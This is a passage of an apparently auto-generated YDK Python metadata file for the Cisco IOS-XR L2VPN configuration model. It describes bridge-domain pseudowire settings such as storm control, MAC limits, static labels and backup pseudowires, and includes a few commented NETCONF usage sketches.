_MetaInfoClassMember('pkts-per-sec', ATTRIBUTE, 'int' , None, None,
[('1', '160000')], [],
                ''' Packets Per Second; PktsPerSec and KbitsPerSec
                cannot be configured together
''',
'pkts_per_sec',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'storm-control-unit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes.BdpwStormControlType' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes.BdpwStormControlType',
False,
[
_MetaInfoClassMember('sctype', REFERENCE_ENUM_CLASS, 'StormControlEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'StormControlEnum',
[], [],
''' Storm Control Type
''',
'sctype',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('storm-control-unit', REFERENCE_CLASS, 'StormControlUnit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes.BdpwStormControlType.StormControlUnit',
[], [],
''' Specify units for Storm Control Configuration
''',
'storm_control_unit',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bdpw-storm-control-type',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes',
False,
[
_MetaInfoClassMember('bdpw-storm-control-type', REFERENCE_LIST, 'BdpwStormControlType' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes.BdpwStormControlType',
[], [],
''' Storm Control Type
''',
'bdpw_storm_control_type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bdpw-storm-control-types',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireProfile' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireProfile',
False,
[
_MetaInfoClassMember('dhcp-snooping-id', ATTRIBUTE, 'str' , None, None,
[], [],
''' Disable DHCP snooping
''',
'dhcp_snooping_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('profile-id', REFERENCE_ENUM_CLASS, 'InterfaceProfileEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterfaceProfileEnum',
[], [],
''' Set the snooping profile
''',
'profile_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-profile',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwStaticMacAddresses.BdPwStaticMacAddress' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwStaticMacAddresses.BdPwStaticMacAddress',
False,
[
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Static MAC address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-pw-static-mac-address',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwStaticMacAddresses' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwStaticMacAddresses',
False,
[
_MetaInfoClassMember('bd-pw-static-mac-address', REFERENCE_LIST, 'BdPwStaticMacAddress' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwStaticMacAddresses.BdPwStaticMacAddress',
[], [],
                ''' Static MAC Address Configuration
''',
'bd_pw_static_mac_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-pw-static-mac-addresses',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireIpSourceGuard' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireIpSourceGuard',
False,
[
_MetaInfoClassMember('disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable Dynamic IP source guard
''',
'disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable IP Source Guard
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', REFERENCE_ENUM_CLASS, 'L2VpnLoggingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnLoggingEnum',
[], [],
''' Logging Type
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-ip-source-guard',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacSecure' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacSecure',
False,
[
_MetaInfoClassMember('action', REFERENCE_ENUM_CLASS, 'MacSecureActionEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacSecureActionEnum',
[], [],
''' MAC secure enforcement action
''',
'action',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable L2 Pseudowire MAC Secure
''',
'disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable MAC Secure
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', REFERENCE_ENUM_CLASS, 'L2VpnLoggingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnLoggingEnum',
[], [],
''' MAC Secure Logging
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-mac-secure',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacAging' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacAging',
False,
[
_MetaInfoClassMember('pseudowire-mac-aging-time', ATTRIBUTE, 'int' , None, None,
[('300', '30000')], [],
''' MAC Aging Time
''',
'pseudowire_mac_aging_time',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mac-aging-type', REFERENCE_ENUM_CLASS, 'MacAgingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacAgingEnum',
[], [],
''' MAC address aging type
''',
'pseudowire_mac_aging_type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-mac-aging',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacLimit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacLimit',
False,
[
_MetaInfoClassMember('pseudowire-mac-limit-action', REFERENCE_ENUM_CLASS, 'MacLimitActionEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLimitActionEnum',
[], [],
''' Bridge Access Pseudowire MAC address
limit enforcement action
''',
'pseudowire_mac_limit_action',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mac-limit-max', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Number of MAC addresses on a Bridge
Access Pseudowire after which MAC limit
action is taken
''',
'pseudowire_mac_limit_max',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mac-limit-notif', REFERENCE_ENUM_CLASS, 'MacNotificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacNotificationEnum',
[], [],
''' MAC address limit notification action
in a Bridge Access Pseudowire
''',
'pseudowire_mac_limit_notif',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-mac-limit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Bridge-domain Pseudowire MAC
configuration mode
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mac-aging', REFERENCE_CLASS, 'PseudowireMacAging' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacAging',
[], [],
''' MAC-Aging configuration commands
''',
'pseudowire_mac_aging',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mac-learning', REFERENCE_ENUM_CLASS, 'MacLearnEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLearnEnum',
[], [],
''' Enable MAC Learning
''',
'pseudowire_mac_learning',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mac-limit', REFERENCE_CLASS, 'PseudowireMacLimit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacLimit',
[], [],
''' MAC-Limit configuration commands
''',
'pseudowire_mac_limit',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mac-port-down-flush', REFERENCE_ENUM_CLASS, 'PortDownFlushEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'PortDownFlushEnum',
[], [],
''' Enable/Disable MAC Flush When Port goes
down
''',
'pseudowire_mac_port_down_flush',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mac-secure', REFERENCE_CLASS, 'PseudowireMacSecure' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacSecure',
[], [],
''' MAC Secure
''',
'pseudowire_mac_secure',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-mac',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwSplitHorizon.BdPwSplitHorizonGroup' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwSplitHorizon.BdPwSplitHorizonGroup',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable split horizon group
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-pw-split-horizon-group',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwSplitHorizon' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwSplitHorizon',
False,
[
_MetaInfoClassMember('bd-pw-split-horizon-group', REFERENCE_CLASS, 'BdPwSplitHorizonGroup' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwSplitHorizon.BdPwSplitHorizonGroup',
[], [],
''' Split Horizon Group
''',
'bd_pw_split_horizon_group',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-pw-split-horizon',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwMplsStaticLabels' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwMplsStaticLabels',
False,
[
_MetaInfoClassMember('local-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire local static label
''',
'local_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('remote-static-label', ATTRIBUTE, 'int' , None, None,
[('16', '1048575')], [],
''' Pseudowire remote static label
''',
'remote_static_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-pw-mpls-static-labels',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
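    # Sketch for static labels on a bridge-domain pseudowire (same YDK
    # assumptions; 'pw' is a placeholder for a BdPseudowire object). Both labels
    # share the 16..1048575 MPLS label range recorded above.
    #
    #   pw.bd_pw_mpls_static_labels.local_static_label = 1000
    #   pw.bd_pw_mpls_static_labels.remote_static_label = 2000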
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BridgeDomainBackupPseudowires.BridgeDomainBackupPseudowire' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BridgeDomainBackupPseudowires.BridgeDomainBackupPseudowire',
False,
[
_MetaInfoClassMember('neighbor', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Neighbor IP address
''',
'neighbor',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('pseudowire-id', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Pseudowire ID
''',
'pseudowire_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('bridge-domain-backup-pw-class', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' PW class template name to use for this
pseudowire
''',
'bridge_domain_backup_pw_class',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domain-backup-pseudowire',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BridgeDomainBackupPseudowires' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BridgeDomainBackupPseudowires',
False,
[
_MetaInfoClassMember('bridge-domain-backup-pseudowire', REFERENCE_LIST, 'BridgeDomainBackupPseudowire' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BridgeDomainBackupPseudowires.BridgeDomainBackupPseudowire',
[], [],
''' Backup pseudowire configuration
''',
'bridge_domain_backup_pseudowire',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domain-backup-pseudowires',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
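    # Sketch for a backup pseudowire (same YDK assumptions): the neighbor IPv4
    # address and the pseudowire ID are both list keys.
    #
    #   bkp = pw.bridge_domain_backup_pseudowires.BridgeDomainBackupPseudowire()
    #   bkp.neighbor = '192.0.2.2'                    # key, IPv4 dotted-quad pattern
    #   bkp.pseudowire_id = 100                       # key, 1..4294967295
    #   bkp.bridge_domain_backup_pw_class = 'pw-class-1'
    #   pw.bridge_domain_backup_pseudowires.bridge_domain_backup_pseudowire.append(bkp)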
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire',
False,
[
_MetaInfoClassMember('neighbor', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Neighbor IP address
''',
'neighbor',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('pseudowire-id', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Pseudowire ID
''',
'pseudowire_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('bd-pw-class', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' PW class template name to use for this
pseudowire
''',
'bd_pw_class',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-pw-mpls-static-labels', REFERENCE_CLASS, 'BdPwMplsStaticLabels' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwMplsStaticLabels',
[], [],
''' MPLS static labels
''',
'bd_pw_mpls_static_labels',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-pw-split-horizon', REFERENCE_CLASS, 'BdPwSplitHorizon' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwSplitHorizon',
[], [],
''' Split Horizon
''',
'bd_pw_split_horizon',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-pw-static-mac-addresses', REFERENCE_CLASS, 'BdPwStaticMacAddresses' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwStaticMacAddresses',
[], [],
                ''' Static MAC Address Table
''',
'bd_pw_static_mac_addresses',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bdpw-storm-control-types', REFERENCE_CLASS, 'BdpwStormControlTypes' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes',
[], [],
''' Storm Control
''',
'bdpw_storm_control_types',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bridge-domain-backup-pseudowires', REFERENCE_CLASS, 'BridgeDomainBackupPseudowires' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BridgeDomainBackupPseudowires',
[], [],
                ''' List of backup pseudowires
''',
'bridge_domain_backup_pseudowires',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-dai', REFERENCE_CLASS, 'PseudowireDai' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireDai',
[], [],
''' Access Pseudowire Dynamic ARP Inspection
''',
'pseudowire_dai',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-flooding', REFERENCE_ENUM_CLASS, 'InterfaceTrafficFloodEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterfaceTrafficFloodEnum',
[], [],
''' Bridge-domain Pseudowire flooding
''',
'pseudowire_flooding',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-flooding-unknown-unicast', REFERENCE_ENUM_CLASS, 'InterfaceTrafficFloodEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterfaceTrafficFloodEnum',
[], [],
''' Bridge-domain Pseudowire flooding Unknown
Unicast
''',
'pseudowire_flooding_unknown_unicast',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-igmp-snoop', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
                ''' Attach an IGMP Snooping profile
''',
'pseudowire_igmp_snoop',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-ip-source-guard', REFERENCE_CLASS, 'PseudowireIpSourceGuard' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireIpSourceGuard',
[], [],
''' IP Source Guard
''',
'pseudowire_ip_source_guard',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mac', REFERENCE_CLASS, 'PseudowireMac' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac',
[], [],
''' Bridge-domain Pseudowire MAC
configuration commands
''',
'pseudowire_mac',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-mld-snoop', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
                ''' Attach an MLD Snooping profile
''',
'pseudowire_mld_snoop',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-profile', REFERENCE_CLASS, 'PseudowireProfile' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireProfile',
[], [],
''' Attach a DHCP profile
''',
'pseudowire_profile',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-pseudowire',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires',
False,
[
_MetaInfoClassMember('bd-pseudowire', REFERENCE_LIST, 'BdPseudowire' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire',
[], [],
''' Pseudowire configuration
''',
'bd_pseudowire',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-pseudowires',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
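    # End-to-end sketch tying the bd-pseudowire metadata together, assuming the
    # standard YDK CRUD workflow (device address and credentials below are
    # placeholders, and the intermediate group/bridge-domain objects are built
    # as in the sketches above):
    #
    #   from ydk.services import CRUDService
    #   from ydk.providers import NetconfServiceProvider
    #   from ydk.models.cisco_ios_xr import Cisco_IOS_XR_l2vpn_cfg as l2vpn_cfg
    #
    #   l2vpn = l2vpn_cfg.L2Vpn()
    #   bd = ...                                      # a BridgeDomain under l2vpn.database
    #   pw = bd.bd_pseudowires.BdPseudowire()
    #   pw.neighbor = '192.0.2.1'                     # key, IPv4 dotted-quad pattern
    #   pw.pseudowire_id = 100                        # key, 1..4294967295
    #   pw.bd_pw_class = 'pw-class-1'                 # string of length 0..32
    #   bd.bd_pseudowires.bd_pseudowire.append(pw)
    #
    #   provider = NetconfServiceProvider(address='10.0.0.1', port=830,
    #                                     username='user', password='pass',
    #                                     protocol='ssh')
    #   CRUDService().create(provider, l2vpn)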
